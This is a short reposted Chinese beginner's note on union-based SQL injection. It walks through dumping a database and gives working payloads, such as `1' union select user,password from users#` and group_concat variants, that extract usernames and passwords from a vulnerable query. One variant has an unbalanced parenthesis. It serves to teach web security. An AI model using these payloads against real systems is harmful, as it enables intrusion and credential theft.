8.sql injection之获取当前列的所有字段值(数据内容)-------小白笔记

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

1.爆库过程是: 爆库名 爆库里的表 爆表里的列字段 爆列里的字段值

2.注意: ①.表里的字段是:字段 ②.列里的内容是:字段值,也就是数据信息

3.注入: ①源码:select first_name,last_name from users where id ='$id' ②构造语句(也就是给$id赋值):1’ union select user,password from users# ③真正执行的语句是:select first_name,last_name from users where id =’ 1' union select user,password from users# ’ //注意①:构造语句也可以一行显示:1' union select group_concat(concat_ws(char(32,58,32),user,password)) from users#

//注意②:构造语句也可以一行显示:1' union select group_concat(user,' ',password)) from users#

4.附图: img

5.SQL注入的思路图:

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102883090
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复